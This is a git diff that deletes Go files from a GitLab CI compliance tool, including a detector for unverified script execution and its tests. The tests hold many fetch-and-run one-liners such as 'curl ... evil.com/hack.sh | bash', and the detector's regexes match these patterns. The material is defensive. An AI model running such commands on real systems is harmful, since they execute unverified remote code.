-
-// GitlabPipelineIncludesForbiddenVersionMetrics holds metrics about forbidden version usage
-type GitlabPipelineIncludesForbiddenVersionMetrics struct {
- Total uint `json:"total"`
- UsingForbiddenVersion uint `json:"usingForbiddenVersion"`
- UsingAuthorizedVersion uint `json:"usingAuthorizedVersion"`
-}
-
-// GitlabPipelineIncludesForbiddenVersionResult holds the result of the forbidden version control
-type GitlabPipelineIncludesForbiddenVersionResult struct {
- Issues []GitlabPipelineIncludesForbiddenVersionIssue `json:"issues"`
- Metrics GitlabPipelineIncludesForbiddenVersionMetrics `json:"metrics"`
- Compliance float64 `json:"compliance"`
- Version string `json:"version"`
- CiValid bool `json:"ciValid"`
- CiMissing bool `json:"ciMissing"`
- Skipped bool `json:"skipped"`
- Error string `json:"error,omitempty"`
-}
-
-////////////////////
-// Control issues //
-////////////////////
-
-// GitlabPipelineIncludesForbiddenVersionIssue represents an issue with a forbidden version
-// Issue data for mutable version usage - PolicyIssueTypeId = [11]
-type GitlabPipelineIncludesForbiddenVersionIssue struct {
- Code ErrorCode `json:"code"`
- DocURL string `json:"docUrl"`
- Version string `json:"version"`
- LatestVersion string `json:"latestVersion,omitempty"`
- PlumberOriginPath string `json:"plumberOriginPath,omitempty"`
- GitlabIncludeLocation string `json:"gitlabIncludeLocation"`
- GitlabIncludeType string `json:"gitlabIncludeType"`
- GitlabIncludeProject string `json:"gitlabIncludeProject,omitempty"`
- Nested bool `json:"nested"`
- ComponentName string `json:"componentName,omitempty"`
- PlumberTemplateName string `json:"plumberTemplateName,omitempty"`
- OriginHash uint64 `json:"originHash"`
-}
-
-///////////////////////
-// Control functions //
-///////////////////////
-
-// Run executes the forbidden version detection control
-func (p *GitlabPipelineIncludesForbiddenVersionConf) Run(pipelineOriginData *collector.GitlabPipelineOriginData, projectDefaultBranch string) *GitlabPipelineIncludesForbiddenVersionResult {
- l := l.WithFields(logrus.Fields{
- "control": "GitlabPipelineIncludesForbiddenVersion",
- "controlVersion": ControlTypeGitlabPipelineOriginVersionVersion,
- })
- l.Info("Start forbidden version control")
-
- result := &GitlabPipelineIncludesForbiddenVersionResult{
- Issues: []GitlabPipelineIncludesForbiddenVersionIssue{},
- Metrics: GitlabPipelineIncludesForbiddenVersionMetrics{},
- Compliance: 100.0, // Start with 100%, will be set to 0 if any forbidden version found
- Version: ControlTypeGitlabPipelineOriginVersionVersion,
- CiValid: pipelineOriginData.CiValid,
- CiMissing: pipelineOriginData.CiMissing,
- Skipped: false,
- }
-
- if !p.Enabled {
- l.Info("Forbidden version control is disabled, skipping")
- result.Skipped = true
- return result
- }
-
- metrics := GitlabPipelineIncludesForbiddenVersionMetrics{}
-
- ///////////////////////////////////////
- // Check for forbidden version usage //
- ///////////////////////////////////////
-
- // Check all origins found in the data collection
- for _, origin := range pipelineOriginData.Origins {
-
- // Skip hardcoded origins and origins without versions
- if origin.OriginType == originHardcoded || origin.Version == "" {
- continue
- }
-
- lOrigin := l.WithFields(logrus.Fields{
- "originType": origin.OriginType,
- "version": origin.Version,
- "location": origin.GitlabIncludeOrigin.Location,
- "fromPlumber": origin.FromPlumber,
- "fromGitlabCatalog": origin.FromGitlabCatalog,
- })
- lOrigin.Debug("Origin version control in progress")
-
- // Create a copy of forbidden versions to avoid modifying the original
- forbiddenVersions := make([]string, len(p.ForbiddenVersions))
- copy(forbiddenVersions, p.ForbiddenVersions)
-
- // Add default branch if configured and available
- // TODO: default branch is not detected for GitLab catalog components yet
- originDefaultBranch := ""
- if origin.FromPlumber {
- // For Plumber templates, get the default branch from template.Repo.DefaultBranch
- originDefaultBranch = origin.PlumberOrigin.RepoDefaultBranch
- } else {
- // Fallback to analyzed project default
- originDefaultBranch = projectDefaultBranch
- }
-
- if p.DefaultBranchIsForbiddenVersion && originDefaultBranch != "" {
- forbiddenVersions = append(forbiddenVersions, originDefaultBranch)
- }
-
- // Check if the version matches any forbidden version pattern
- isForbiddenVersion := gitlab.CheckItemMatchToPatterns(origin.Version, forbiddenVersions)
-
- if isForbiddenVersion {
- // Determine the appropriate latest version based on origin type
- latestVersion := ""
- plumberOriginPath := ""
- plumberTemplateName := ""
-
- if origin.FromPlumber {
- latestVersion = origin.PlumberOrigin.LatestVersion
- plumberOriginPath = origin.PlumberOrigin.Path
- plumberTemplateName = origin.PlumberOrigin.Path
- } else if origin.FromGitlabCatalog {
- latestVersion = origin.GitlabComponent.ComponentLatestVersion
- }
-
- // Extract template name from the path (just the last part after the last "/")
- templateName := plumberTemplateName
- if plumberTemplateName != "" && strings.Contains(plumberTemplateName, "/") {
- templateName = plumberTemplateName[strings.LastIndex(plumberTemplateName, "/")+1:]
- }
-
- // Extract component name from gitlabIncludeLocation if it's a component and componentName is empty
- componentName := origin.GitlabComponent.ComponentName
- if origin.GitlabIncludeOrigin.Type == "component" && componentName == "" && origin.GitlabIncludeOrigin.Location != "" {
- if strings.Contains(origin.GitlabIncludeOrigin.Location, "/") {
- componentName = origin.GitlabIncludeOrigin.Location[strings.LastIndex(origin.GitlabIncludeOrigin.Location, "/")+1:]
- }
- }
-
- // Create issue for forbidden version
- issue := GitlabPipelineIncludesForbiddenVersionIssue{
- Code: CodeIncludeForbiddenVersion,
- DocURL: CodeIncludeForbiddenVersion.DocURL(),
- Version: origin.Version,
- LatestVersion: latestVersion,
- PlumberOriginPath: plumberOriginPath,
- GitlabIncludeLocation: origin.GitlabIncludeOrigin.Location,
- GitlabIncludeType: origin.GitlabIncludeOrigin.Type,
- GitlabIncludeProject: origin.GitlabIncludeOrigin.Project,
- Nested: origin.Nested,
- ComponentName: componentName,
- PlumberTemplateName: templateName,
- OriginHash: origin.OriginHash,
- }
-
- result.Issues = append(result.Issues, issue)
- metrics.UsingForbiddenVersion++
-
- lOrigin.WithField("forbiddenVersions", forbiddenVersions).Info("Forbidden version detected")
- } else {
- // Update metrics for valid versions
- metrics.UsingAuthorizedVersion++
- }
- }
-
- // Calculate total metrics
- metrics.Total = metrics.UsingForbiddenVersion + metrics.UsingAuthorizedVersion
-
- // Set compliance: 0% if any forbidden version found, 100% otherwise
- if len(result.Issues) > 0 {
- result.Compliance = 0.0
- } else {
- result.Compliance = 100.0
- }
-
- // Update result with final metrics
- result.Metrics = metrics
-
- l.WithFields(logrus.Fields{
- "totalOrigins": metrics.Total,
- "forbiddenVersionOrigins": metrics.UsingForbiddenVersion,
- "compliance": result.Compliance,
- }).Info("Forbidden version control completed")
-
- return result
-}
diff --git a/control/controlGitlabPipelineUnverifiedScripts.go b/control/controlGitlabPipelineUnverifiedScripts.go
deleted file mode 100644
index 993269c..0000000
--- a/control/controlGitlabPipelineUnverifiedScripts.go
+++ /dev/null
@@ -1,284 +0,0 @@
-package control
-
-import (
- "fmt"
- "regexp"
- "strings"
-
- "github.com/getplumber/plumber/collector"
- "github.com/getplumber/plumber/configuration"
- "github.com/getplumber/plumber/gitlab"
- "github.com/sirupsen/logrus"
-)
-
-const ControlTypeGitlabPipelineUnverifiedScriptsVersion = "0.1.0"
-
-//////////////////
-// Control conf //
-//////////////////
-
-// GitlabPipelineUnverifiedScriptsConf holds the configuration for unverified script execution detection
-type GitlabPipelineUnverifiedScriptsConf struct {
- Enabled bool `json:"enabled"`
- TrustedUrls []string `json:"trustedUrls"`
-}
-
-// GetConf loads configuration from PlumberConfig
-func (p *GitlabPipelineUnverifiedScriptsConf) GetConf(plumberConfig *configuration.PlumberConfig) error {
- if plumberConfig == nil {
- p.Enabled = false
- return nil
- }
-
- cfg := plumberConfig.GetPipelineMustNotExecuteUnverifiedScriptsConfig()
- if cfg == nil {
- l.Debug("pipelineMustNotExecuteUnverifiedScripts control configuration is missing from .plumber.yaml file, skipping")
- p.Enabled = false
- return nil
- }
-
- if cfg.Enabled == nil {
- return fmt.Errorf("pipelineMustNotExecuteUnverifiedScripts.enabled field is required in .plumber.yaml config file")
- }
-
- p.Enabled = cfg.IsEnabled()
- p.TrustedUrls = cfg.TrustedUrls
-
- l.WithFields(logrus.Fields{
- "enabled": p.Enabled,
- "trustedUrls": len(p.TrustedUrls),
- }).Debug("pipelineMustNotExecuteUnverifiedScripts control configuration loaded from .plumber.yaml file")
-
- return nil
-}
-
-////////////////////////////
-// Control data & metrics //
-////////////////////////////
-
-// GitlabPipelineUnverifiedScriptsMetrics holds metrics about unverified script detection
-type GitlabPipelineUnverifiedScriptsMetrics struct {
- JobsChecked uint `json:"jobsChecked"`
- TotalScriptLinesChecked uint `json:"totalScriptLinesChecked"`
- UnverifiedScriptsFound uint `json:"unverifiedScriptsFound"`
-}
-
-// GitlabPipelineUnverifiedScriptsResult holds the result of the control
-type GitlabPipelineUnverifiedScriptsResult struct {
- Issues []GitlabPipelineUnverifiedScriptsIssue `json:"issues"`
- Metrics GitlabPipelineUnverifiedScriptsMetrics `json:"metrics"`
- Compliance float64 `json:"compliance"`
- Version string `json:"version"`
- CiValid bool `json:"ciValid"`
- CiMissing bool `json:"ciMissing"`
- Skipped bool `json:"skipped"`
- Error string `json:"error,omitempty"`
-}
-
-////////////////////
-// Control issues //
-////////////////////
-
-// GitlabPipelineUnverifiedScriptsIssue represents an unverified script execution found in a CI job
-type GitlabPipelineUnverifiedScriptsIssue struct {
- Code ErrorCode `json:"code"`
- DocURL string `json:"docUrl"`
- JobName string `json:"jobName"`
- ScriptLine string `json:"scriptLine"`
- ScriptBlock string `json:"scriptBlock"`
- PatternType string `json:"patternType"`
-}
-
-///////////////////////
-// Control functions //
-///////////////////////
-
-// Compiled regexes for detecting unverified script execution patterns.
-
-// pipeToShell: curl ... | bash, wget ... | sh, etc. (with optional sudo)
-var pipeToShellRe = regexp.MustCompile(
- `(?i)(curl|wget)\s+[^|]*\|\s*(sudo\s+)?(bash|sh|zsh|python[23]?|perl|ruby)\b`,
-)
-
-// downloadAndExec: curl -o file && bash file, wget -O file && sh file
-var downloadAndExecRe = regexp.MustCompile(
- `(?i)(curl|wget)\s+.*(-o|-O)\s+(\S+).*&&\s*(sudo\s+)?(bash|sh|source|\.)\s+`,
-)
-
-// downloadRedirectExec: curl ... > file.sh; sh file.sh
-var downloadRedirectExecRe = regexp.MustCompile(
- `(?i)(curl|wget)\s+.*>\s*(\S+\.sh)\s*[;&]+\s*(sudo\s+)?(bash|sh|source|\.)\s+`,
-)
-
-// checksumVerificationRe matches lines that include a checksum or signature
-// verification step between the download and execution. These lines show that
-// the user is verifying integrity before running the script.
-var checksumVerificationRe = regexp.MustCompile(
- `(?i)(sha256sum|sha512sum|sha1sum|md5sum|shasum|gpg\s+--verify|gpg2\s+--verify|cosign\s+verify)`,
-)
-
-var unverifiedScriptPatterns = []struct {
- re *regexp.Regexp
- patternType string
-}{
- {pipeToShellRe, "pipe-to-shell"},
- {downloadAndExecRe, "download-and-execute"},
- {downloadRedirectExecRe, "download-redirect-execute"},
-}
-
-// Run executes the unverified script execution detection control
-func (p *GitlabPipelineUnverifiedScriptsConf) Run(pipelineOriginData *collector.GitlabPipelineOriginData) *GitlabPipelineUnverifiedScriptsResult {
- l := l.WithFields(logrus.Fields{
- "control": "GitlabPipelineUnverifiedScripts",
- "controlVersion": ControlTypeGitlabPipelineUnverifiedScriptsVersion,
- })
- l.Info("Start unverified script execution detection control")
-
- result := &GitlabPipelineUnverifiedScriptsResult{
- Issues: []GitlabPipelineUnverifiedScriptsIssue{},
- Metrics: GitlabPipelineUnverifiedScriptsMetrics{},
- Compliance: 100.0,
- Version: ControlTypeGitlabPipelineUnverifiedScriptsVersion,
- CiValid: pipelineOriginData.CiValid,
- CiMissing: pipelineOriginData.CiMissing,
- Skipped: false,
- }
-
- if !p.Enabled {
- l.Info("Unverified script execution detection control is disabled, skipping")
- result.Skipped = true
- return result
- }
-
- mergedConf := pipelineOriginData.MergedConf
- if mergedConf == nil {
- l.Warn("Merged CI configuration not available, cannot check scripts")
- result.Compliance = 0
- result.Error = "merged CI configuration not available"
- return result
- }
-
- // Compile trusted URL patterns into regexes for matching
- trustedPatterns := compileTrustedURLPatterns(p.TrustedUrls)
-
- // Check global before_script and after_script
- p.scanForUnverifiedScripts(mergedConf.BeforeScript, "(global)", "before_script", trustedPatterns, result)
- p.scanForUnverifiedScripts(mergedConf.AfterScript, "(global)", "after_script", trustedPatterns, result)
-
- // Check per-job scripts
- for jobName, jobContent := range mergedConf.GitlabJobs {
- job, err := gitlab.ParseGitlabCIJob(jobContent)
- if err != nil {
- l.WithError(err).WithField("job", jobName).Debug("Unable to parse job, skipping")
- continue
- }
- if job == nil {
- continue
- }
-
- result.Metrics.JobsChecked++
-
- p.scanForUnverifiedScripts(job.Script, jobName, "script", trustedPatterns, result)
- p.scanForUnverifiedScripts(job.BeforeScript, jobName, "before_script", trustedPatterns, result)
- p.scanForUnverifiedScripts(job.AfterScript, jobName, "after_script", trustedPatterns, result)
- }
-
- if len(result.Issues) > 0 {
- result.Compliance = 0.0
- }
-
- l.WithFields(logrus.Fields{
- "compliance": result.Compliance,
- "issuesFound": len(result.Issues),
- "jobsChecked": result.Metrics.JobsChecked,
- "totalScriptLines": result.Metrics.TotalScriptLinesChecked,
- "unverifiedScriptsFound": result.Metrics.UnverifiedScriptsFound,
- }).Info("Unverified script execution detection control complete")
-
- return result
-}
-
-// scanForUnverifiedScripts checks a script block for unverified script execution patterns.
-func (p *GitlabPipelineUnverifiedScriptsConf) scanForUnverifiedScripts(
- scriptField interface{},
- jobName string,
- blockType string,
- trustedPatterns []*regexp.Regexp,
- result *GitlabPipelineUnverifiedScriptsResult,
-) {
- lines := gitlab.GetScriptLines(scriptField)
- for _, line := range lines {
- result.Metrics.TotalScriptLinesChecked++
-
- trimmed := strings.TrimSpace(line)
- if trimmed == "" || strings.HasPrefix(trimmed, "#") {
- continue
- }
-
- for _, pattern := range unverifiedScriptPatterns {
- if pattern.re.MatchString(trimmed) {
- if containsTrustedURL(trimmed, trustedPatterns) {
- continue
- }
- if checksumVerificationRe.MatchString(trimmed) {
- continue
- }
-
- result.Issues = append(result.Issues, GitlabPipelineUnverifiedScriptsIssue{
- Code: CodeUnverifiedScriptExecution,
- DocURL: CodeUnverifiedScriptExecution.DocURL(),
- JobName: jobName,
- ScriptLine: truncateScriptLine(trimmed, 200),
- ScriptBlock: blockType,
- PatternType: pattern.patternType,
- })
- result.Metrics.UnverifiedScriptsFound++
- break
- }
- }
- }
-}
-
-// compileTrustedURLPatterns converts trusted URL patterns into compiled regexes.
-// Each pattern is matched exactly unless it contains a wildcard (*), which
-// matches any sequence of characters. Patterns are anchored so that
-// "https://example.com" only matches that exact URL, not subpaths. Use
-// "https://example.com/*" to match all subpaths.
-func compileTrustedURLPatterns(trustedUrls []string) []*regexp.Regexp {
- var patterns []*regexp.Regexp
- for _, u := range trustedUrls {
- u = strings.TrimSpace(u)
- if u == "" {
- continue
- }
- escaped := regexp.QuoteMeta(u)
- // Convert \* (escaped wildcard) back to .* for glob-style matching
- regexStr := `(?:^|[\s"'])` + strings.ReplaceAll(escaped, `\*`, `.*`) + `(?:$|[\s"'])`
- re, err := regexp.Compile(regexStr)
- if err != nil {
- l.WithError(err).WithField("pattern", u).Warn("Invalid trusted URL pattern, skipping")
- continue
- }
- patterns = append(patterns, re)
- }
- return patterns
-}
-
-// containsTrustedURL checks whether the script line contains a URL that matches
-// any of the compiled trusted URL patterns.
-func containsTrustedURL(line string, trustedPatterns []*regexp.Regexp) bool {
- for _, re := range trustedPatterns {
- if re.MatchString(line) {
- return true
- }
- }
- return false
-}
-
-// truncateScriptLine truncates a script line to the given max length.
-func truncateScriptLine(s string, maxLen int) string {
- if len(s) <= maxLen {
- return s
- }
- return s[:maxLen-3] + "..."
-}
diff --git a/control/controlGitlabPipelineUnverifiedScripts_test.go b/control/controlGitlabPipelineUnverifiedScripts_test.go
deleted file mode 100644
index e964436..0000000
--- a/control/controlGitlabPipelineUnverifiedScripts_test.go
+++ /dev/null
@@ -1,378 +0,0 @@
-package control
-
-import (
- "testing"
-
- "github.com/getplumber/plumber/collector"
- "github.com/getplumber/plumber/gitlab"
-)
-
-func buildOriginDataWithScriptJobs(jobs map[string]interface{}) *collector.GitlabPipelineOriginData {
- mergedConf := &gitlab.GitlabCIConf{
- GitlabJobs: jobs,
- }
- return &collector.GitlabPipelineOriginData{
- MergedConf: mergedConf,
- CiValid: true,
- CiMissing: false,
- }
-}
-
-func TestUnverifiedScripts_Disabled(t *testing.T) {
- conf := &GitlabPipelineUnverifiedScriptsConf{Enabled: false}
- data := buildOriginDataWithScriptJobs(nil)
-
- result := conf.Run(data)
-
- if !result.Skipped {
- t.Fatal("expected control to be skipped when disabled")
- }
- if result.Compliance != 100.0 {
- t.Fatalf("expected compliance 100 when skipped, got %v", result.Compliance)
- }
-}
-
-func TestUnverifiedScripts_NilMergedConf(t *testing.T) {
- conf := &GitlabPipelineUnverifiedScriptsConf{Enabled: true}
- data := &collector.GitlabPipelineOriginData{
- MergedConf: nil,
- CiValid: true,
- CiMissing: false,
- }
-
- result := conf.Run(data)
-
- if result.Compliance != 0 {
- t.Fatalf("expected compliance 0 when merged conf unavailable, got %v", result.Compliance)
- }
- if result.Error == "" {
- t.Fatal("expected error message when merged conf unavailable")
- }
-}
-
-func TestUnverifiedScripts_NoJobs(t *testing.T) {
- conf := &GitlabPipelineUnverifiedScriptsConf{Enabled: true}
- data := buildOriginDataWithScriptJobs(map[string]interface{}{})
-
- result := conf.Run(data)
-
- if result.Compliance != 100.0 {
- t.Fatalf("expected compliance 100 with no jobs, got %v", result.Compliance)
- }
- if len(result.Issues) != 0 {
- t.Fatalf("expected 0 issues, got %d", len(result.Issues))
- }
-}
-
-// -- Direct pipe-to-shell patterns --
-
-func TestUnverifiedScripts_CurlPipeBash(t *testing.T) {
- conf := &GitlabPipelineUnverifiedScriptsConf{Enabled: true}
-
- tests := []struct {
- name string
- script string
- }{
- {"curl pipe bash", "curl -fsSL https://example.com/install.sh | bash"},
- {"curl pipe sh", "curl -sSL https://evil.com/script.sh | sh"},
- {"wget pipe bash", "wget -qO- https://example.com/install.sh | bash"},
- {"wget pipe sh", "wget -O - https://example.com/setup.sh | sh"},
- {"curl pipe sudo bash", "curl -fsSL https://get.docker.com | sudo bash"},
- {"curl pipe sudo sh", "curl https://example.com/install.sh | sudo sh"},
- {"curl pipe python", "curl https://example.com/script.py | python"},
- {"curl pipe python3", "curl https://example.com/script.py | python3"},
- {"wget pipe perl", "wget -O- https://example.com/setup.pl | perl"},
- {"curl pipe ruby", "curl -fsSL https://example.com/setup.rb | ruby"},
- {"curl pipe zsh", "curl -fsSL https://example.com/install.sh | zsh"},
- }
-
- for _, tt := range tests {
- t.Run(tt.name, func(t *testing.T) {
- jobContent := map[interface{}]interface{}{
- "script": []interface{}{tt.script},
- }
- data := buildOriginDataWithScriptJobs(map[string]interface{}{"install": jobContent})
- result := conf.Run(data)
- if len(result.Issues) != 1 {
- t.Fatalf("script %q should be flagged, expected 1 issue, got %d", tt.script, len(result.Issues))
- }
- if result.Issues[0].PatternType != "pipe-to-shell" {
- t.Fatalf("expected pattern type 'pipe-to-shell', got %q", result.Issues[0].PatternType)
- }
- if result.Compliance != 0.0 {
- t.Fatalf("expected compliance 0, got %v", result.Compliance)
- }
- })
- }
-}
-
-// -- Download-and-execute patterns --
-
-func TestUnverifiedScripts_DownloadAndExecute(t *testing.T) {
- conf := &GitlabPipelineUnverifiedScriptsConf{Enabled: true}
-
- tests := []struct {
- name string
- script string
- }{
- {"curl -o then bash", "curl -o install.sh https://example.com/install.sh && bash install.sh"},
- {"wget -O then sh", "wget -O setup.sh https://example.com/setup.sh && sh setup.sh"},
- {"curl -o then source", "curl -o config.sh https://example.com/config.sh && source config.sh"},
- }
-
- for _, tt := range tests {
- t.Run(tt.name, func(t *testing.T) {
- jobContent := map[interface{}]interface{}{
- "script": []interface{}{tt.script},
- }
- data := buildOriginDataWithScriptJobs(map[string]interface{}{"setup": jobContent})
- result := conf.Run(data)
- if len(result.Issues) != 1 {
- t.Fatalf("script %q should be flagged, expected 1 issue, got %d", tt.script, len(result.Issues))
- }
- if result.Issues[0].PatternType != "download-and-execute" {
- t.Fatalf("expected pattern type 'download-and-execute', got %q", result.Issues[0].PatternType)
- }
- })
- }
-}
-
-// -- Download-redirect-execute patterns --
-
-func TestUnverifiedScripts_DownloadRedirectExecute(t *testing.T) {
- conf := &GitlabPipelineUnverifiedScriptsConf{Enabled: true}
-
- tests := []struct {
- name string
- script string
- }{
- {"curl redirect then sh", "curl https://example.com/install > install.sh; sh install.sh"},
- {"wget redirect then bash", "wget https://example.com/setup > setup.sh; bash setup.sh"},
- }
-
- for _, tt := range tests {
- t.Run(tt.name, func(t *testing.T) {
- jobContent := map[interface{}]interface{}{
- "script": []interface{}{tt.script},
- }
- data := buildOriginDataWithScriptJobs(map[string]interface{}{"setup": jobContent})
- result := conf.Run(data)
- if len(result.Issues) != 1 {
- t.Fatalf("script %q should be flagged, expected 1 issue, got %d", tt.script, len(result.Issues))
- }
- if result.Issues[0].PatternType != "download-redirect-execute" {
- t.Fatalf("expected pattern type 'download-redirect-execute', got %q", result.Issues[0].PatternType)
- }
- })
- }
-}
-
-// -- Safe patterns that should NOT be flagged --
-
-func TestUnverifiedScripts_SafePatterns(t *testing.T) {
- conf := &GitlabPipelineUnverifiedScriptsConf{Enabled: true}
-
- tests := []struct {
- name string
- script string
- }{
- {"curl to file only", "curl -o installer.sh https://example.com/install.sh"},
- {"wget to file only", "wget https://example.com/setup.sh"},
- {"curl with checksum", "curl -o script.sh https://example.com/script.sh && sha256sum -c script.sh.sha256 && bash script.sh"},
- {"echo with pipe", "echo 'hello world' | bash -c 'cat'"},
- {"cat pipe bash", "cat local_script.sh | bash"},
- {"normal curl POST", "curl -X POST -d '{\"key\": \"value\"}' https://api.example.com"},
- {"apt-get install", "apt-get install -y curl wget"},
- {"pip install", "pip install requests"},
- {"comment line", "# curl https://example.com/install.sh | bash"},
- {"empty line", ""},
- }
-
- for _, tt := range tests {
- t.Run(tt.name, func(t *testing.T) {
- jobContent := map[interface{}]interface{}{
- "script": []interface{}{tt.script},
- }
- data := buildOriginDataWithScriptJobs(map[string]interface{}{"build": jobContent})
- result := conf.Run(data)
- if len(result.Issues) != 0 {
- t.Fatalf("script %q should be safe, but got %d issues", tt.script, len(result.Issues))
- }
- if result.Compliance != 100.0 {
- t.Fatalf("expected compliance 100, got %v", result.Compliance)
- }
- })
- }
-}
-
-// -- Trusted URLs --
-
-func TestUnverifiedScripts_TrustedUrls(t *testing.T) {
- conf := &GitlabPipelineUnverifiedScriptsConf{
- Enabled: true,
- TrustedUrls: []string{"https://internal.example.com/*", "https://trusted.io/install.sh"},
- }
-
- tests := []struct {
- name string
- script string
- expectHit bool
- }{
- {"trusted wildcard", "curl -fsSL https://internal.example.com/tools/setup.sh | bash", false},
- {"trusted exact", "curl -fsSL https://trusted.io/install.sh | bash", false},
- {"untrusted", "curl -fsSL https://evil.com/hack.sh | bash", true},
- {"exact does not match subpath", "curl -fsSL https://trusted.io/install.sh/evil | bash", true},
- {"without wildcard does not match subpath", "curl -fsSL https://trusted.io/install.sh/extra | bash", true},
- }
-
- for _, tt := range tests {
- t.Run(tt.name, func(t *testing.T) {
- jobContent := map[interface{}]interface{}{
- "script": []interface{}{tt.script},
- }
- data := buildOriginDataWithScriptJobs(map[string]interface{}{"setup": jobContent})
- result := conf.Run(data)
- if tt.expectHit && len(result.Issues) == 0 {
- t.Fatalf("script %q should be flagged but was not", tt.script)
- }
- if !tt.expectHit && len(result.Issues) > 0 {
- t.Fatalf("script %q should be trusted but got %d issues", tt.script, len(result.Issues))
- }
- })
- }
-}
-
-// -- Global scripts --
-
-func TestUnverifiedScripts_GlobalScripts(t *testing.T) {
- conf := &GitlabPipelineUnverifiedScriptsConf{Enabled: true}
-
- mergedConf := &gitlab.GitlabCIConf{
- BeforeScript: []interface{}{"curl https://example.com/setup.sh | bash"},
- AfterScript: []interface{}{"wget -qO- https://example.com/cleanup.sh | sh"},
- GitlabJobs: map[string]interface{}{},
- }
- data := &collector.GitlabPipelineOriginData{
- MergedConf: mergedConf,
- CiValid: true,
- CiMissing: false,
- }
-
- result := conf.Run(data)
-
- if len(result.Issues) != 2 {
- t.Fatalf("expected 2 issues from global scripts, got %d", len(result.Issues))
- }
- for _, issue := range result.Issues {
- if issue.JobName != "(global)" {
- t.Fatalf("expected job name '(global)', got %q", issue.JobName)
- }
- }
-}
-
-// -- before_script and after_script in jobs --
-
-func TestUnverifiedScripts_JobScriptBlocks(t *testing.T) {
- conf := &GitlabPipelineUnverifiedScriptsConf{Enabled: true}
-
- jobContent := map[interface{}]interface{}{
- "before_script": []interface{}{"curl https://example.com/pre.sh | bash"},
- "script": []interface{}{"echo 'safe'"},
- "after_script": []interface{}{"wget -qO- https://example.com/post.sh | sh"},
- }
- data := buildOriginDataWithScriptJobs(map[string]interface{}{"deploy": jobContent})
-
- result := conf.Run(data)
-
- if len(result.Issues) != 2 {
- t.Fatalf("expected 2 issues, got %d", len(result.Issues))
- }
-
- blocks := map[string]bool{}
- for _, issue := range result.Issues {
- blocks[issue.ScriptBlock] = true
- if issue.JobName != "deploy" {
- t.Fatalf("expected job name 'deploy', got %q", issue.JobName)
- }
- }
- if !blocks["before_script"] || !blocks["after_script"] {
- t.Fatal("expected issues in both before_script and after_script")
- }
-}
-
-// -- Multiple issues in one job --
-
-func TestUnverifiedScripts_MultipleIssuesPerJob(t *testing.T) {
- conf := &GitlabPipelineUnverifiedScriptsConf{Enabled: true}
-
- jobContent := map[interface{}]interface{}{
- "script": []interface{}{
- "curl https://example.com/first.sh | bash",
- "echo 'safe command'",
- "wget -qO- https://example.com/second.sh | sh",
- },
- }
- data := buildOriginDataWithScriptJobs(map[string]interface{}{"multi": jobContent})
-
- result := conf.Run(data)
-
- if len(result.Issues) != 2 {
- t.Fatalf("expected 2 issues, got %d", len(result.Issues))
- }
- if result.Metrics.UnverifiedScriptsFound != 2 {
- t.Fatalf("expected 2 unverified scripts in metrics, got %d", result.Metrics.UnverifiedScriptsFound)
- }
-}
-
-// -- Issue code and DocURL --
-
-func TestUnverifiedScripts_IssueCodeAndDocURL(t *testing.T) {
- conf := &GitlabPipelineUnverifiedScriptsConf{Enabled: true}
-
- jobContent := map[interface{}]interface{}{
- "script": []interface{}{"curl https://example.com/install.sh | bash"},
- }
- data := buildOriginDataWithScriptJobs(map[string]interface{}{"install": jobContent})
-
- result := conf.Run(data)
-
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue, got %d", len(result.Issues))
- }
-
- issue := result.Issues[0]
- if issue.Code != CodeUnverifiedScriptExecution {
- t.Fatalf("expected code %s, got %s", CodeUnverifiedScriptExecution, issue.Code)
- }
- if issue.DocURL != CodeUnverifiedScriptExecution.DocURL() {
- t.Fatalf("expected DocURL %s, got %s", CodeUnverifiedScriptExecution.DocURL(), issue.DocURL)
- }
-}
-
-// -- Case insensitivity --
-
-func TestUnverifiedScripts_CaseInsensitive(t *testing.T) {
- conf := &GitlabPipelineUnverifiedScriptsConf{Enabled: true}
-
- tests := []struct {
- name string
- script string
- }{
- {"CURL pipe BASH", "CURL -fsSL https://example.com/install.sh | BASH"},
- {"Curl pipe Bash", "Curl -fsSL https://example.com/install.sh | Bash"},
- {"WGET pipe SH", "WGET -qO- https://example.com/setup.sh | SH"},
- }
-
- for _, tt := range tests {
- t.Run(tt.name, func(t *testing.T) {
- jobContent := map[interface{}]interface{}{
- "script": []interface{}{tt.script},
- }
- data := buildOriginDataWithScriptJobs(map[string]interface{}{"build": jobContent})
- result := conf.Run(data)
- if len(result.Issues) != 1 {
- t.Fatalf("script %q should be flagged (case insensitive), expected 1 issue, got %d", tt.script, len(result.Issues))
- }
- })
- }
-}
diff --git a/control/controlGitlabPipelineVariableInjection.go b/control/controlGitlabPipelineVariableInjection.go
deleted file mode 100644
index 432a83e..0000000
--- a/control/controlGitlabPipelineVariableInjection.go
+++ /dev/null
@@ -1,288 +0,0 @@
-package control
-
-import (
- "fmt"
- "regexp"
- "strings"
-
- "github.com/getplumber/plumber/collector"
- "github.com/getplumber/plumber/configuration"
- "github.com/getplumber/plumber/gitlab"
- "github.com/sirupsen/logrus"
-)
-
-const ControlTypeGitlabPipelineVariableInjectionVersion = "0.1.0"
-
-//////////////////
-// Control conf //
-//////////////////
-
-// GitlabPipelineVariableInjectionConf holds the configuration for unsafe variable expansion detection
-type GitlabPipelineVariableInjectionConf struct {
- Enabled bool `json:"enabled"`
- DangerousVariables []string `json:"dangerousVariables"`
- AllowedPatterns []string `json:"allowedPatterns"`
-}
-
-// GetConf loads configuration from PlumberConfig
-func (p *GitlabPipelineVariableInjectionConf) GetConf(plumberConfig *configuration.PlumberConfig) error {
- if plumberConfig == nil {
- p.Enabled = false
- return nil
- }
-
- cfg := plumberConfig.GetPipelineMustNotUseUnsafeVariableExpansionConfig()
- if cfg == nil {
- l.Debug("pipelineMustNotUseUnsafeVariableExpansion control configuration is missing from .plumber.yaml file, skipping")
- p.Enabled = false
- return nil
- }
-
- if cfg.Enabled == nil {
- return fmt.Errorf("pipelineMustNotUseUnsafeVariableExpansion.enabled field is required in .plumber.yaml config file")
- }
-
- p.Enabled = cfg.IsEnabled()
- p.DangerousVariables = cfg.DangerousVariables
- p.AllowedPatterns = cfg.AllowedPatterns
-
- l.WithFields(logrus.Fields{
- "enabled": p.Enabled,
- "dangerousVariables": len(p.DangerousVariables),
- "allowedPatterns": len(p.AllowedPatterns),
- }).Debug("pipelineMustNotUseUnsafeVariableExpansion control configuration loaded from .plumber.yaml file")
-
- return nil
-}
-
-////////////////////////////
-// Control data & metrics //
-////////////////////////////
-
-// GitlabPipelineVariableInjectionMetrics holds metrics about unsafe variable expansion detection
-type GitlabPipelineVariableInjectionMetrics struct {
